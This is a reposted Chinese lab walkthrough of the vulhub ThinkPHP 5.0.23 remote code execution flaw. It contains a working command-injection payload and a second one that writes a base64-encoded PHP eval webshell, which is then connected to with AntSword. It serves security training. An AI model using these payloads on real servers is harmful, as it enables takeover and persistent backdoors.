当前位置: 首页> 健康> 养生 > vulhub ThinkPHP5 5.0.23远程代码执行漏洞

vulhub ThinkPHP5 5.0.23远程代码执行漏洞

时间:2025/8/7 1:47:06来源:https://blog.csdn.net/2301_82061181/article/details/142026269 浏览次数:1次

步骤一:.执行以下命令启动靶场环境并在浏览器访问

cd thinkphp/5.0.23-rce
docker-compose up -d
docker ps

步骤二:访问靶机环境

步骤三:/index.php?s=captcha

步骤四:利用HackBar

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=dir

步骤五:通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码

步骤六:发送POST 请求

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > shell.php

步骤七:访问shell.php

步骤八:进行蚁剑连接

关键字:vulhub ThinkPHP5 5.0.23远程代码执行漏洞

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: